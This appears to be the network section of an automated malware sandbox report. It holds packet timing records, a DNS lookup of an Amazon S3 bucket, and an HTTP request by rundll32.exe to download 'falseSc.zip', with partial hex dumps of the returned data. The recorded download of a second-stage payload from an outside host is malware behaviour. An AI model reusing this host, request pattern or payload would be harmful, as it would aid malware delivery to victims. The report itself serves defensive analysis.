                                                                            Jan 30, 2024 13:32:43.477339029 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.477363110 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.477389097 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.477396011 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.477417946 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.477440119 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.477539062 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.477577925 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.477601051 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.477608919 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.477627039 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.477674961 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.477721930 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.477773905 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.477792978 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.477802992 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.477824926 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.477844954 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.477988958 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.478035927 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.478056908 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.478065014 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.478094101 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.478113890 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.478162050 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.478207111 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.478230953 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.478240967 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.478260040 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.478280067 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.478346109 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.478388071 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.478404999 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.478462934 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.478506088 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.478516102 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.478586912 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.478630066 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.478663921 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.478693962 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.478704929 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.478732109 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.478770018 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.478811979 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.478838921 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.478846073 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.478874922 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.478882074 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.478945971 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.478986025 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.479007959 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.479013920 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.479043961 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.479052067 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.479114056 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.479154110 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.479177952 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.479187012 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.479216099 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.479224920 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.479280949 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.479321003 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.479353905 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.479360104 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.479381084 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.479392052 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.479465008 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.479507923 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.479521990 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.479528904 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.479574919 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.479587078 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.479649067 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.479734898 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.479752064 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.479760885 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.479780912 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.479803085 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.479863882 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.479908943 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.479984045 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.479990959 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.480009079 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.480026960 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.480047941 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.480087042 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.480114937 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.480122089 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.480138063 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.480154991 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.480223894 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.480267048 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.480294943 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.480300903 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.480321884 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.480340958 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.480397940 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.480439901 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.480468988 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.480483055 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.480500937 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.480529070 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.480571985 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.480618000 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.480652094 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.480664968 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.480679035 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.480716944 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.480736017 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.480777979 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.480811119 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.480818033 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.480854988 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.480868101 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.480905056 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.480948925 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.480964899 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.480973959 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.480987072 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.481004953 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.481079102 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.481117964 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.481132030 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.481138945 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.481163979 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.481182098 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.481246948 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.481290102 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.481311083 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.481318951 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.481332064 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.481354952 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.481425047 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.481467009 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.481499910 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.481506109 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.481524944 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.481539965 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.481599092 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.481637955 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.481672049 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.481678009 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.481690884 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.481748104 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.481766939 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.481807947 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.481844902 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.481853962 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.481864929 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.481897116 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.482022047 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.482068062 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.482099056 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.482105017 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.482119083 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.482142925 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.482202053 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.482240915 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.482275009 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.482280970 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.482290983 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.482321024 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.482373953 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.482413054 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.482433081 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.482440948 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.482456923 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.482469082 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.482537985 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.482578993 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.482595921 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.482605934 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.482625008 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.482647896 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.482717037 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.482754946 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.482788086 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.482794046 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.482820988 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.482834101 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.482871056 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.482909918 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.482944012 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.482950926 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.482963085 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.482990026 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.483017921 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.483062029 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.483074903 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.483087063 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.483117104 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.483139992 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.483355999 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.483403921 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.483439922 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.483447075 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.483457088 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.483505011 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.484144926 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.484189034 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.484224081 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.484230995 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.484252930 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.484270096 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.484338999 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.484385014 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.484400988 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.484409094 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:43.484436035 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:43.484455109 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:44.644974947 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:44.644994974 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:44.645019054 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:44.645046949 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:44.645067930 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:44.645097017 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:44.645261049 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:44.873152971 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:44.873259068 CET4434973552.95.163.114192.168.2.4
                                                                            Jan 30, 2024 13:32:44.873286963 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:44.873452902 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:44.873452902 CET49735443192.168.2.452.95.163.114
                                                                            Jan 30, 2024 13:32:44.873536110 CET49735443192.168.2.452.95.163.114
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 30, 2024 13:32:39.865561962 CET5286153192.168.2.41.1.1.1
                                                                            Jan 30, 2024 13:32:40.005392075 CET53528611.1.1.1192.168.2.4
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Jan 30, 2024 13:32:39.865561962 CET192.168.2.41.1.1.10x54a0Standard query (0)b38709202.s3.sa-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Jan 30, 2024 13:32:40.005392075 CET1.1.1.1192.168.2.40x54a0No error (0)b38709202.s3.sa-east-1.amazonaws.coms3-r-w.sa-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jan 30, 2024 13:32:40.005392075 CET1.1.1.1192.168.2.40x54a0No error (0)s3-r-w.sa-east-1.amazonaws.com52.95.163.114A (IP address)IN (0x0001)false
                                                                            Jan 30, 2024 13:32:40.005392075 CET1.1.1.1192.168.2.40x54a0No error (0)s3-r-w.sa-east-1.amazonaws.com3.5.232.102A (IP address)IN (0x0001)false
                                                                            Jan 30, 2024 13:32:40.005392075 CET1.1.1.1192.168.2.40x54a0No error (0)s3-r-w.sa-east-1.amazonaws.com16.12.0.94A (IP address)IN (0x0001)false
                                                                            Jan 30, 2024 13:32:40.005392075 CET1.1.1.1192.168.2.40x54a0No error (0)s3-r-w.sa-east-1.amazonaws.com16.12.2.14A (IP address)IN (0x0001)false
                                                                            Jan 30, 2024 13:32:40.005392075 CET1.1.1.1192.168.2.40x54a0No error (0)s3-r-w.sa-east-1.amazonaws.com52.95.163.11A (IP address)IN (0x0001)false
                                                                            Jan 30, 2024 13:32:40.005392075 CET1.1.1.1192.168.2.40x54a0No error (0)s3-r-w.sa-east-1.amazonaws.com52.95.164.35A (IP address)IN (0x0001)false
                                                                            Jan 30, 2024 13:32:40.005392075 CET1.1.1.1192.168.2.40x54a0No error (0)s3-r-w.sa-east-1.amazonaws.com16.12.1.90A (IP address)IN (0x0001)false
                                                                            Jan 30, 2024 13:32:40.005392075 CET1.1.1.1192.168.2.40x54a0No error (0)s3-r-w.sa-east-1.amazonaws.com52.95.164.122A (IP address)IN (0x0001)false
                                                                            • b38709202.s3.sa-east-1.amazonaws.com
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.44973552.95.163.1144437516C:\Windows\SysWOW64\rundll32.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-01-30 12:32:40 UTC307OUTGET /falseSc.zip HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                            Host: b38709202.s3.sa-east-1.amazonaws.com
                                                                            Connection: Keep-Alive
                                                                            2024-01-30 12:32:41 UTC423INHTTP/1.1 200 OK
                                                                            x-amz-id-2: bZmaScVS0jlVw0xyt8qTSWXyM5hFTLiX7b4sLdaT7df8kx1NfJekU4TUXuo9IP/MpEqeVuX/P90=
                                                                            x-amz-request-id: QFTT040247AHFASH
                                                                            Date: Tue, 30 Jan 2024 12:32:41 GMT
                                                                            Last-Modified: Sun, 28 Jan 2024 00:29:55 GMT
                                                                            ETag: "51b2093e0b5ed5e5222783d1e118f078"
                                                                            x-amz-server-side-encryption: AES256
                                                                            Accept-Ranges: bytes
                                                                            Content-Type: application/zip
                                                                            Server: AmazonS3
                                                                            Content-Length: 8773630
                                                                            Connection: close
                                                                            2024-01-30 12:32:41 UTC510INData Raw: 48 7e 88 45 61 e7 06 6b 79 4a f7 5f f8 a9 83 d3 0e 40 f5 ca da 03 3c f4 3d af 80 7d 88 5d 7f 8a 41 1f 29 d6 57 f8 f1 a0 0a 19 af 22 bb 67 62 80 fd d8 73 ca 0b 2e 6c 52 f8 d5 34 70 b8 d5 85 65 6b 4a 19 84 f3 e2 d0 ef a6 90 d7 6e d4 17 fa 71 fb 7e dd 50 0a b3 b1 d7 1c b5 28 4a 21 ef c9 f8 76 0e 4d 61 3e ff 3c 9b 2b 28 fa 72 a0 3e 15 cc b2 c3 86 46 c1 8b 67 38 af ed 6b 20 65 ce cc d4 9e 52 62 91 a2 53 cb f7 93 e8 77 96 e3 ee 5e ec 99 b5 2c a9 60 93 9c ef 54 c3 bc 39 60 7a 43 d0 c0 d7 3f 92 33 37 88 01 ca 5f 16 59 26 21 0b 84 4c b3 49 d8 bb 8c 48 1e 71 0f f7 33 7b 53 d6 48 cf d7 86 fc f5 ca de 0b 02 44 92 76 31 6b 1d 5b bd 5e 6e ae fb 2d bd dc 06 01 1c 4a ee 03 d7 ed 57 00 63 13 23 79 0e 47 2c 15 55 a2 d3 e3 fb 28 56 ca b9 a7 65 02 ec 45 4d 9d d4 0c 2d 21 66
                                                                            Data Ascii: H~EakyJ_@<=}]A)W"gbs.lR4pekJnq~P(J!vMa><+(r>Fg8k eRbSw^,`T9`zC?37_Y&!LIHq3{SHDv1k[^n-JWc#yG,U(VeEM-!f
                                                                            2024-01-30 12:32:41 UTC16384INData Raw: b8 8f c9 33 9e a0 e9 a0 fd 5f b2 38 f4 19 58 59 7e 8e 3b 7f 07 7e 25 12 12 9a b8 3a 75 63 a3 79 22 b0 37 a4 b2 91 25 de 88 69 70 c0 ef a8 70 16 0b 8a 13 0b 4c 69 01 bb 77 68 ef ae 86 9c fd 6a 8e 5f 0a 93 52 3a 93 19 1e a8 1b 34 ae 03 39 cd 16 85 d1 c6 1f 60 09 f5 5f ef 60 ac 93 8b f2 50 59 43 de e8 6b 31 a5 c0 c3 82 d2 fb 5f 24 de 0d 28 61 ae 2e 4e 86 b5 41 06 bd bb 5c bb eb 3c c6 8e 2f 00 ec fe d4 cf 45 0b fa 2d b9 18 ca 64 4d ad 2e 1e f9 01 8c d8 1b 69 f6 90 79 95 e1 47 33 21 ec 04 90 1a 30 71 d1 c5 b0 43 2a ad 63 6d 09 52 26 57 3f f4 45 40 e0 df d1 96 a4 c6 b4 d0 d1 ef 96 e9 56 80 1d 37 39 83 4d 66 cf c8 9d 0c d4 d8 b6 f8 13 b1 40 93 47 8e 9f 0c b3 d8 ce 22 23 f6 a9 09 ba b0 24 12 0e cf d8 cc bc 97 f4 67 0a 62 fd 38 17 9f d0 a7 74 59 51 5a b5 11 a1 64
                                                                            Data Ascii: 3_8XY~;~%:ucy"7%ippLiwhj_R:49`_`PYCk1_$(a.NA\</E-dM.iyG3!0qC*cmR&W?E@V79Mf@G"#$gb8tYQZd
                                                                            2024-01-30 12:32:41 UTC1024INData Raw: fd 76 f7 ff 91 38 cc 8f 71 bf c5 54 06 f9 b4 c3 3f 8d 0a 90 31 e8 cb 9f a0 48 f4 0f 58 16 c1 e7 ac 5f 8b b9 c7 b4 b9 d2 c6 d2 d3 a3 f9 15 04 ee 84 9b 06 6e eb 3f b5 b5 8d 60 76 c1 45 8c 03 16 fd 4c 27 9a 65 36 55 90 77 05 5f 06 f6 f8 54 cf 19 f8 27 2c 4e f9 53 89 bb fc b7 b2 6e ec 46 61 3f 5a 0a 6e 12 a7 b5 53 49 a9 0f 83 3e 5d c1 36 dd 1a 8a 9c 30 2a f3 9c 94 29 5c 85 27 89 1b 60 9e 9b a1 ff 70 7c 24 49 8f 69 28 63 bc b3 17 29 b8 b1 30 96 4b 80 af 38 38 63 6d 93 2b 53 fc e5 3e 2e d4 72 35 00 b7 d0 64 3d 26 60 4c b7 15 45 26 d0 f2 40 04 ba bd 01 3c 9c b3 74 cc db 4a fb 24 ae c7 03 b8 64 53 be e8 41 ac 0d 5e 24 10 db ea d0 c5 74 dd e7 6a 4a 05 0e df 07 f3 78 1d 84 99 ae a6 07 8a 30 75 f2 5c 0a 64 10 f5 e0 d5 5f 94 7f 83 b4 3f 20 9e 78 c8 09 0c b4 9a 46 20
                                                                            Data Ascii: v8qT?1HX_n?`vEL'e6Uw_T',NSnFa?ZnSI>]60*)\'`p|$Ii(c)0K88cm+S>.r5d=&`LE&@<tJ$dSA^$tjJx0u\d_? xF
                                                                            2024-01-30 12:32:41 UTC16384INData Raw: 16 8b 76 dd f1 a5 ed cf bb 9b 78 6b a5 24 e0 bb 18 67 ec 8d 33 8c 60 85 e2 a8 e9 a9 60 c4 be d6 95 48 44 31 3f 5d 29 0a 32 1c a9 0a b9 2f 2a 77 94 64 e7 d4 47 19 ab 91 74 3d 44 d7 da a5 a2 06 87 5d 11 91 59 69 31 e3 e7 91 03 33 c1 d5 2e b4 79 58 fc b6 d5 9a 1e ff a2 e1 f1 c1 77 dd f0 e7 4d 21 74 f9 33 d2 15 81 7b db 21 40 53 21 56 7f 45 21 9d 05 2c de 42 d2 5e c0 26 0e cc 1b fc 6b 52 75 03 e7 4f 7c b8 ee a8 78 84 5f 36 0d 17 91 45 76 09 6f f1 08 e1 cd 29 dd 40 11 7a 17 7e 22 c9 f8 a7 81 a7 b7 65 c9 0f 05 50 88 11 8f 7b 5f a8 ac 86 b3 ac 1c 64 b2 3c e1 24 9d 0b 65 95 70 e1 73 d7 2b 8d 46 ad a8 3f 91 8f 21 57 10 fa be 4b 3a 85 fb e0 9c 34 38 99 e0 97 9d 98 ca 52 94 15 06 43 ff f9 07 3c 32 37 c0 be 21 84 c7 6b 66 6b 1d 8d f5 89 b0 26 0e af 3c 67 3f 68 61 40
                                                                            Data Ascii: vxk$g3``HD1?])2/*wdGt=D]Yi13.yXwM!t3{!@S!VE!,B^&kRuO|x_6Evo)@z~"eP{_d<$eps+F?!WK:48RC<27!kfk&<g?ha@
